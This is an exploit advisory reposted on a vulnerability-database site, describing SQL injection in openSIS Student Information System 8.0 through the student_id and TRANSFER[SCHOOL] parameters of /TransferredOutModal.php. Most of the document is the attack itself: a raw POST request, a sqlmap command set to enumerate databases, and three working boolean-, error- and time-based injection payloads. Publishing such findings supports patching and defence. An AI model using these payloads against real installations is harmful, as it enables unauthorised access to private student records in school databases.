Sunday, February 6, 2022

openSIS Student Information System 8.0 - 'multiple' SQL Injection

# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection
# Date: 26/12/2021
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: 8.0 Community Edition
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team -



A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php.

The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php.


POST /TransferredOutModal.php?modfunc=detail

Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5

if an attacker exploits this vulnerability, attacker may access private data in the database system.


POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: localhost
User-Agent: user-agent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cookie
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 69


Example sqlmap Command: -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs

Example Payloads:

Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5


We are a team that has been working on cyber security in the industry for a long time.

In 2020, we created where everyone can test their website security and get help to fix their vulnerabilities.

We have many free tools that you can use here:


Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore